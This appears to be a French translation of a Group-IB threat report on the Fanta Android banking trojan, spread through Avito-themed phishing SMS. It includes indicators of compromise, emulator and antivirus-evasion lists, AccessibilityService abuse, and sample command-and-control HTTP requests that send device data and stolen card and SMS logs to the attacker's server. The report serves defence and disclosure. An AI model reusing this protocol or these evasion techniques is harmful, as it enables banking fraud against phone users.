Une fois que vous souhaitez vendre quelque chose sur Avito et, après avoir présenté une description détaillée de votre produit (par exemple, un module RAM), vous obtiendrez ce message:
Lorsque vous ouvrez le lien, vous verrez une page plutôt inoffensive qui vous informe, en tant que vendeur heureux et prospère, de l'achat:
Après avoir cliqué sur le bouton «Continuer», un fichier APK avec l'icône et un nom fiable sera téléchargé sur votre appareil Android. Vous avez installé une application qui, pour une raison quelconque, a demandé les droits AccessibilityService, puis quelques fenêtres sont apparues et ont rapidement disparu et ... C'est tout.
Vous entrez pour vérifier votre solde, mais pour une raison quelconque, votre application bancaire vous demande à nouveau les détails de votre carte. Après avoir entré les données, une chose terrible se produit: pour une raison qui n'est pas encore claire pour vous, l'argent commence à disparaître de votre compte. Vous essayez de résoudre le problème, mais votre téléphone résiste: il appuie sur les touches «Retour» et «Accueil», ne s'éteint pas et ne permet d'activer aucun moyen de protection. En conséquence, vous vous retrouvez sans argent, vos biens n'ont pas été achetés, vous êtes confus et vous vous demandez: que s'est-il passé?
La réponse est simple: vous êtes victime du cheval de Troie Android Fanta, la famille Flexnet. Comment est-ce arrivé? Nous allons expliquer maintenant.
Auteurs:
Andrey Polovinkin , spécialiste junior en analyse de codes malveillants,
Ivan Pisarev , spécialiste en analyse de codes malveillants.
Quelques statistiques
Pour la première fois, la famille Flexnet Android Trojan est devenue connue en 2015. Sur une assez longue période d'activité, la famille s'est étendue à plusieurs sous-espèces: Fanta, Limebot, Lipton, etc. Le cheval de Troie, ainsi que l'infrastructure qui lui est associée, ne reste pas immobile: de nouveaux schémas de distribution efficaces sont en cours de développement - dans notre cas, des pages de phishing de haute qualité destinées à un utilisateur-vendeur spécifique, et les développeurs du cheval de Troie suivent les tendances de la mode en matière d'écriture de virus - ajoutent de nouvelles fonctionnalités qui vous permettent de voler plus efficacement l'argent provenant d'appareils infectés et de mécanismes de protection contre les contournements
La campagne décrite dans cet article s'adresse aux utilisateurs russes, un petit nombre d'appareils infectés ont été détectés en Ukraine, et encore moins au Kazakhstan et en Biélorussie.
Malgré le fait que Flexnet soit dans l'arène des chevaux de Troie Android depuis plus de 4 ans et a été étudié en détail par de nombreux chercheurs, il est toujours en bonne forme. À partir de janvier 2019, le montant potentiel des dommages est supérieur à 35 millions de roubles - et cela uniquement pour les campagnes en Russie. En 2015, différentes versions de ce cheval de Troie Android ont été vendues sur des forums clandestins, où le code source du cheval de Troie avec une description détaillée a également pu être trouvé. Et cela signifie que les statistiques des dommages dans le monde sont encore plus impressionnantes. Un bon indicateur pour un si vieil homme, non?
De la vente à la tricherie
Comme vous pouvez le voir sur la capture d'écran de la page de phishing du service Internet pour placer les publicités Avito présentées précédemment, il a été préparé pour une victime spécifique. Apparemment, les attaquants utilisent l'un des analyseurs Avito, retirant le numéro de téléphone et le nom du vendeur, ainsi qu'une description du produit. Une fois la page développée et le fichier APK préparé, un SMS est envoyé à la victime avec son nom et un lien vers la page de phishing contenant une description de son produit et le montant reçu de la «vente» du produit. En cliquant sur le bouton, l'utilisateur reçoit un fichier APK malveillant - Fanta.
Un examen du domaine shcet491 [.] Ru a montré qu'il était délégué aux serveurs DNS de Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Le fichier de zone de domaine contient des entrées pointant vers les adresses IP 31.220.23 [.] 236, 31.220.23 [.] 243 et 31.220.23 [.] 235. Toutefois, l'enregistrement de ressource maître de domaine (enregistrement A) pointe vers un serveur avec une adresse IP de 178.132.1 [.] 240.
L'adresse IP 178.132.1 [.] 240 est située aux Pays-Bas et appartient à l'
hébergeur WorldStream. Les adresses IP 31.220.23 [.] 235, 31.220.23 [.] 236 et 31.220.23 [.] 243 sont situées au Royaume-Uni et appartiennent au serveur d'hébergement partagé HOSTINGER.
Openprov-ru est utilisé comme registraire. Les domaines suivants ont également été résolus avec l'adresse IP 178.132.1 [.] 240:
- sdelka-ru [.] ru
- tovar-av [.] ru
- av-tovar [.] ru
- ru-sdelka [.] ru
- shcet382 [.] ru
- sdelka221 [.] ru
- sdelka211 [.] ru
- vyplata437 [.] ru
- viplata291 [.] ru
- perevod273 [.] ru
- perevod901 [.] ru
Il convient de noter que presque tous les domaines avaient des liens du format suivant:
http: // (www.) {0,1} <% domaine%> / [0-9] {7}Un lien à partir d'un message SMS relève également de ce modèle. Selon les données historiques, il a été constaté qu'un lien correspond à plusieurs liens selon le modèle ci-dessus, ce qui indique l'utilisation d'un domaine pour distribuer le cheval de Troie à plusieurs victimes.
Avançons un peu: en tant que serveur de contrôle, le cheval de Troie téléchargé via un lien depuis SMS utilise l'adresse
onuseseddohap [.] Club . Ce domaine a été enregistré le 2019-03-12, et à partir du 2019-04-29, des applications APK ont interagi avec ce domaine. Sur la base des données reçues de VirusTotal, un total de 109 applications ont interagi avec ce serveur. Le domaine lui-même a été résolu à l'adresse IP
217.23.14 [.] 27 , située aux Pays-Bas et appartenant à l'
hébergeur WorldStream. Le
namecheap est utilisé comme registraire. Les domaines
bad-racoon [.] Club (à partir du 25/09/2018) et
bad-racoon [.] Live (à partir du 25/10/2018) ont également été résolus avec cette adresse IP. Plus de 80 fichiers APK ont interagi avec le domaine
Bad-racoon [.] Club , plus de 100 ont interagi avec le domaine
Live bad-racoon [.] .
En général, la progression de l'attaque est la suivante:
Qu'est-ce que Fanta a sous le capot?
Comme de nombreux autres chevaux de Troie Android, Fanta est capable de lire et d'envoyer des messages SMS, de faire des demandes USSD, d'afficher ses propres fenêtres au-dessus des applications (y compris bancaires). Cependant, l'arsenal de fonctionnalités de cette famille est arrivé: Fanta a commencé à utiliser
AccessibilityService à différentes fins: lire le contenu des notifications d'autres applications, empêcher la détection et l'arrêt de l'exécution du cheval de Troie sur un appareil infecté, etc. Fanta fonctionne sur toutes les versions d'Android pas plus tôt que 4.4. Dans cet article, nous allons examiner de plus près l'exemple Fanta suivant:
- MD5 : 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1 : ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256 : df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Immédiatement après le lancement
Immédiatement après le lancement, le cheval de Troie cache son icône. Le fonctionnement de l'application n'est possible que si le nom du périphérique infecté ne figure pas dans la liste:
- android_x86
- Virtualbox
- Nexus 5X (bullhead)
- Nexus 5 (rasoir)
Cette vérification est effectuée dans le service principal du cheval de Troie -
MainService . Au premier démarrage, les paramètres de configuration de l'application sont initialisés avec des valeurs par défaut (le format de stockage des données de configuration et leur valeur seront discutés plus tard), ainsi que l'enregistrement d'un nouveau périphérique infecté sur le serveur de gestion. Une requête HTTP POST sera envoyée au serveur avec le type de message
register_bot et des informations sur le périphérique infecté (version Android, IMEI, numéro de téléphone, nom de l'opérateur et code de pays dans lequel l'opérateur est enregistré). L'adresse du serveur est
hXXp: // onuseseddohap [.] Club / controller.php . En réponse, le serveur envoie un message contenant les champs
bot_id ,
bot_pwd ,
server - l'application enregistre ces valeurs en tant que paramètres du serveur CnC. Le paramètre
serveur est facultatif si le champ n'a pas été reçu: Fanta utilise l'adresse d'enregistrement -
hXXp: // onuseseddohap [.] Club / controller.php . La fonction de modification de l'adresse CnC peut être utilisée pour résoudre deux problèmes: répartir uniformément la charge entre plusieurs serveurs (avec un grand nombre de périphériques infectés, la charge sur un serveur Web non optimisé peut être élevée), et également utiliser un serveur alternatif en cas de défaillance de l'un des serveurs CnC .
Si une erreur s'est produite lors de l'envoi de la demande, le cheval de Troie répétera le processus d'enregistrement après 20 secondes.
Après avoir enregistré l'appareil avec succès, Fanta affichera le message suivant à l'utilisateur:
Remarque importante: un service appelé
Sécurité du système est le nom du service cheval de Troie, et après avoir cliqué sur le bouton
OK, une fenêtre s'ouvre avec les paramètres d'accessibilité du périphérique infecté, où l'utilisateur doit émettre des droits d'accessibilité pour le service malveillant:
Dès que l'utilisateur active le service d'
accessibilité , Fanta accède au contenu des fenêtres d'application et aux actions qui y sont effectuées:
Immédiatement après avoir reçu les droits d'accessibilité, le cheval de Troie demande des droits d'administrateur et le droit de lire les notifications:
En utilisant AccessibilityService, l'application simule les frappes, se donnant ainsi tous les droits nécessaires.
Fanta crée plusieurs instances de base de données (qui seront décrites plus loin) qui sont nécessaires pour enregistrer les données de configuration, ainsi que des informations sur le périphérique infecté collectées au cours du processus. Pour envoyer les informations collectées, le cheval de Troie crée une tâche répétitive conçue pour décharger les champs de la base de données et recevoir une commande du serveur de contrôle. L'intervalle d'accès à CnC est défini en fonction de la version d'Android: dans le cas de 5.1, l'intervalle sera de 10 secondes, sinon 60 secondes.
Pour recevoir une commande, Fanta fait une demande
GetTask au serveur de gestion. En réponse, CnC peut envoyer l'une des commandes suivantes:
Fanta collecte également les notifications de 70 applications bancaires, systèmes de paiement rapide et portefeuilles électroniques et les stocke dans une base de données.
Stockage des paramètres de configuration
Pour stocker les paramètres de configuration, Fanta utilise l'approche standard pour la plate-forme Android - Fichiers de
préférences . Les paramètres seront enregistrés dans un fichier appelé
paramètres . La description des paramètres enregistrés se trouve dans le tableau ci-dessous.
Fanta utilise également le fichier
smsManager :
Interaction avec la base de données
Dans le cadre de ses travaux, le cheval de Troie utilise deux bases de données. Une base de données appelée
a est utilisée pour stocker diverses informations collectées à partir du téléphone. La deuxième base de données s'appelle
fanta.db et est utilisée pour enregistrer les paramètres responsables de la création de fenêtres de phishing conçues pour collecter des informations sur les cartes bancaires.
Le cheval de Troie utilise une base de données pour stocker les informations qu'il recueille et pour consigner ses actions. Les données sont stockées dans la table des
journaux . Pour créer une table, utilisez la requête SQL suivante:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)
La base de données contient les informations suivantes:
1. Connexion à l'inclusion d'un appareil infecté avec le message
Téléphone allumé!2. Notifications des applications. Le message est formé selon le modèle suivant:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Données de carte bancaire provenant des formulaires de phishing cheval de Troie.
Le paramètre
VIEW_NAME peut faire partie de la liste:
- AliExpress
- Avito
- Google play
- Divers <% App Name%>
Le message est enregistré au format:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) :<%CARD_NUMBER%>; :<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Messages SMS entrants / sortants au format:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] : /) <%Mobile number%>:<%SMS-text%>
5. Informations sur le package qui crée la boîte de dialogue au format:
(<%Package name%>)<%Package information%>
Exemple de table des
journaux :
L'une des caractéristiques de Fanta est la collecte d'informations sur les cartes bancaires. La collecte de données se produit en raison de la création de fenêtres de phishing lors de l'ouverture des applications bancaires. Le cheval de Troie ne crée une fenêtre de phishing qu'une seule fois. Les informations que la fenêtre a été présentée à l'utilisateur sont stockées dans le tableau des
paramètres de la base de données
fanta.db . La requête SQL suivante est utilisée pour créer la base de données:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);
Tous les champs du tableau des
paramètres sont initialisés par défaut à 1 (créer une fenêtre de phishing). Une fois que l'utilisateur a entré ses données, la valeur est définie sur 0. Exemples de champs du tableau des
paramètres :
- can_login - le champ est chargé d'afficher le formulaire lors de l'ouverture d'une application bancaire
- first_bank - non utilisé
- can_avito - le champ est chargé d'afficher le formulaire lors de l'ouverture de l'application Avito
- can_ali - le champ est responsable de montrer le formulaire lors de l'ouverture de l'application Aliexpress
- can_another - le champ est chargé d'afficher le formulaire lors de l'ouverture d'une application de la liste: Yula, Pandao, Drome Auto, Wallet. Cartes de réduction et bonus, Aviasales, Réservation, Trivago
- can_card - le champ est chargé d'afficher le formulaire lors de l'ouverture de Google Play
Interaction avec le serveur d'administration
La communication réseau avec le serveur de gestion se fait via HTTP. Fanta utilise la bibliothèque populaire Retrofit pour travailler avec le réseau. Les demandes sont envoyées à
hXXp: // onuseseddohap [.] Club / controller.php . L'adresse du serveur peut être modifiée lors de l'inscription sur le serveur. Un cookie peut provenir du serveur. Fanta exécute les demandes de serveur suivantes:
- Le bot est enregistré sur le serveur de gestion une fois au premier démarrage. Les données suivantes sur le périphérique infecté sont envoyées au serveur:
· Cookies - cookies reçus du serveur (la valeur par défaut est une chaîne vide)
· Mode - chaîne constante register_bot
Préfixe - constante entière 2
· Version_sdk - généré par le modèle suivant: <% Build.MODEL%> / <% Build.VERSION.RELEASE%> (Avit)
Imei - IMEI du périphérique infecté
· Pays - code du pays dans lequel l'opérateur est enregistré, au format ISO
· Numéro - numéro de téléphone
· Opérateur - nom de l' opérateur
Un exemple de requête envoyée au serveur:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
En réponse à la demande, le serveur doit renvoyer un objet JSON contenant les paramètres suivants:
· Bot_id - identifiant du périphérique infecté. Si bot_id vaut 0, Fanta réexécutera la demande.
· Bot_pwd - mot de passe pour le serveur.
· Serveur - l'adresse du serveur de gestion. Paramètre facultatif. Si le paramètre n'est pas spécifié, l'adresse stockée dans l'application sera utilisée.
Exemple d'objet JSON:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Demande de recevoir une commande du serveur. Les données suivantes sont envoyées au serveur:
· Cookies - cookies reçus du serveur
· Bid - id de l'appareil infecté qui a été reçu lors de l'envoi de la demande register_bot
· Pwd - mot de passe pour le serveur
· Divice_admin - le champ détermine si les droits d'administrateur ont été obtenus. Si des droits d'administrateur ont été obtenus, le champ est 1 , sinon 0
· Accessibilité - l'état du service d'accessibilité. Si le service a été démarré, la valeur est 1 , sinon 0
· SMSManager - indique si le cheval de Troie est activé comme application par défaut pour recevoir des SMS
· Écran - affiche l'état de l'écran. Il sera mis à 1 si l'écran est allumé, sinon 0 ;
Un exemple de requête envoyée au serveur:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
Selon la commande, le serveur peut renvoyer un objet JSON avec différents paramètres:
· Commande Envoyer un SMS : les paramètres contiennent le numéro de téléphone, le texte du SMS et l'identifiant du message à envoyer. L'identifiant est utilisé lors de l'envoi d'un message au serveur avec le type setSmsStatus .
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }
· Effectuer un appel téléphonique ou une commande USSD : le numéro de téléphone ou la commande apparaît dans le corps de la réponse.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }
· Commande Modifiez le paramètre d'intervalle .
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }
· Paramètre d'interception de changement de commande.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }
· La commande de champ Changer SmsManager .
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }
· Commande Collecter des messages SMS à partir d'un appareil infecté .
{ "response": [ { "mode": 9 } ], "status":"ok" }
· Réinitialiser le téléphone aux paramètres d'usine :
{ "response": [ { "mode": 11 } ], "status":"ok" }
· Paramètre ReadDialog de changement de commande.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Envoi d'un message avec le type setSmsStatus . Cette demande est effectuée après la commande Envoyer SMS . La demande est la suivante:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>
- Envoi du contenu de la base de données. Pour une demande, une ligne est transmise. Les données suivantes sont envoyées au serveur:
· Cookies - cookies reçus du serveur
· Mode - chaîne constante setSaveInboxSms
· Bid - id de l'appareil infecté qui a été reçu lors de l'envoi de la demande register_bot
· Texte - texte dans l'enregistrement de base de données actuel (champ d de la table des journaux dans la base de données a )
· Numéro - nom de l'enregistrement de base de données actuel (champ p des journaux de table dans la base de données a )
Sms_mode - valeur entière (champ m des journaux de table dans la base de données a )
La demande est la suivante:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
En cas d'envoi réussi au serveur, la ligne sera supprimée de la table. Un exemple de l'objet JSON retourné par le serveur:
{ "response":[], "status":"ok" }
Interaction avec AccessibilityService
AccessibilityService a été mis en œuvre pour faciliter l'utilisation des appareils Android par les personnes handicapées. Dans la plupart des cas, une interaction physique est requise pour interagir avec l'application. AccessibilityService vous permet de les faire par programmation. Fanta utilise le service pour créer de fausses fenêtres dans les applications bancaires et empêcher l'ouverture des paramètres système et de certaines applications.
À l'aide des fonctionnalités d'AccessibilityService, le cheval de Troie surveille les modifications des éléments à l'écran d'un appareil infecté. Comme décrit précédemment, dans les paramètres Fanta, il existe un paramètre responsable des opérations de journalisation avec les boîtes de dialogue -
readDialog . Si ce paramètre est défini, des informations sur le nom et la description du package qui a déclenché l'événement seront ajoutées à la base de données. Le cheval de Troie effectue les actions suivantes lorsque des événements sont déclenchés:
- Simule les frappes au dos et à la maison en cas de:
· Si l'utilisateur souhaite redémarrer son appareil
· Si l'utilisateur souhaite supprimer l'application «Avito» ou modifier les droits d'accès
· Si la page mentionne l'application «Avito»
· Lorsque vous ouvrez l'application "Google Play Protection"
· Lors de l'ouverture de pages avec des paramètres AccessibilityService
· Lorsque la boîte de dialogue «Sécurité du système» apparaît
· Lors de l'ouverture de la page avec les paramètres "Dessiner sur une autre application"
· Lorsque vous ouvrez la page "Applications", "Restaurer et réinitialiser", "Réinitialiser les données", "Réinitialiser les paramètres", "Panneau développeur", "Spécial. Opportunités »,« Accessibilité »,« Droits spéciaux »
· Si l'événement a été généré par certaines applications.
Liste des applications- android
- Master lite
- Maître propre
- Clean Master pour CPU x86
- Meizu Applicatiom Permission Management
- Sécurité MIUI
- Clean Master - Antivirus & Cleanup Cache and Junk
- Contrôle parental et GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Virus Cleaner, Antivirus, Cleaner (MAX Security)
- Mobile AntiVirus Security PRO
- Antivirus Avast et protection gratuite 2019
- Mobile Security MegaFon
- Protection AVG pour Xperia
- Sécurité mobile
- Malwarebytes Antivirus & Protection
- Antivirus sur Android 2019
- Security Master - Antivirus, VPN, AppLock, Booster
- Antivirus AVG pour tablette Huawei System Manager
- Accessibilité Samsung
- Samsung Smart Manager
- Maître de la sécurité
- Booster de vitesse
- Dr.Web
- Espace de sécurité Dr.Web
- Centre de contrôle mobile Dr.Web
- Dr.Web Security Space Life
- Centre de contrôle mobile Dr.Web
- Antivirus et sécurité mobile
- Kaspersky Internet Security: antivirus et protection
- Autonomie de la batterie Kaspersky: économiseur et amplificateur
- Kaspersky Endpoint Security - protection et gestion
- AVG Antivirus gratuit 2019 - Protection pour Android
- Antivirus Android
- Norton Mobile Security et Antivirus
- Antivirus, pare-feu, VPN, sécurité mobile
- Sécurité mobile: antivirus, VPN, antivol
- Antivirus pour Android
- Si l'autorisation est demandée lors de l'envoi d'un SMS à un petit numéro, Fanta imite de cliquer sur la case à cocher Mémoriser la sélection et envoyer .
- Lorsque vous essayez de retirer les droits d'administrateur au cheval de Troie, il verrouille l'écran du téléphone.
- Empêche l'ajout de nouveaux administrateurs.
- Si l'application antivirus dr.web détecte une menace, Fanta imite un clic sur le bouton ignorer .
- Un cheval de Troie imite de cliquer sur un bouton retour et accueil si un événement a été généré par l'application Samsung Device Care .
- Fanta crée des fenêtres de phishing avec des formulaires pour saisir des informations sur les cartes bancaires si une application a été lancée à partir d'une liste qui comprend environ 30 services Internet différents. Parmi eux: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drome Auto, etc.
Formes de phishing
Fanta analyse les applications exécutées sur le périphérique infecté. Si une application d'intérêt a été ouverte, le cheval de Troie affiche une fenêtre de phishing au-dessus de toutes les autres, qui est un formulaire pour entrer des informations sur une carte bancaire. L'utilisateur doit saisir les données suivantes:
- Numéro de carte
- Date d'expiration de la carte
- CVV
- Nom du titulaire de la carte (pas pour toutes les banques)
Selon l'application en cours d'exécution, différentes fenêtres de phishing s'afficheront. Voici quelques exemples de certains d'entre eux:
Aliexpress:
Avito:
Pour certaines autres applications, par exemple Google Play Market, Aviasales, Pandao, Booking, Trivago:
Comment c'était vraiment
Heureusement, la personne qui a reçu le SMS décrit au début de l'article s'est avérée être un spécialiste dans le domaine de la cybersécurité. Par conséquent, la version réelle, non-réalisatrice, diffère de celle racontée précédemment: la personne a reçu un SMS intéressant, après quoi il l'a remis à l'équipe du Group-IB Threat Hunting Intelligence. Le résultat de l'attaque est cet article. Fin heureuse, non? Cependant, toutes les histoires ne se terminent pas avec autant de succès et pour que la vôtre ne ressemble pas à la version de réalisateur avec une perte d'argent, dans la plupart des cas, il suffit de respecter les règles décrites ci-dessous:
- n'installez pas d'applications pour un appareil mobile avec Android OS à partir de sources autres que Google Play
- lors de l'installation de l'application, faites particulièrement attention aux droits demandés par l'application
- faites attention à l'extension de fichier
- installer régulièrement des mises à jour Android OS
- Ne visitez pas les ressources suspectes et ne téléchargez pas de fichiers à partir de là
- Ne suivez pas les liens reçus dans les messages SMS.
Group-IB sait tout sur la cybercriminalité, mais raconte les choses les plus intéressantes.
La chaîne Telegram pleine d'action (https://t.me/Group_IB) sur la sécurité de l'information, les pirates et les cyberattaques, les hacktivistes et les pirates Internet. Enquêtes sur la cybercriminalité sensationnelle par étapes, cas pratiques utilisant les technologies du Groupe IB et, bien sûr, recommandations sur la façon d'éviter de devenir une victime sur Internet.
Chaîne YouTube ici
Photowire Group-IB sur Instagram www.instagram.com/group_ib
Nouvelles brèves Twitter twitter.com/GroupIB
Group-IB est l'un des principaux développeurs de solutions pour détecter et prévenir les cyberattaques, détecter les fraudes et protéger la propriété intellectuelle dans un réseau dont le siège est à Singapour.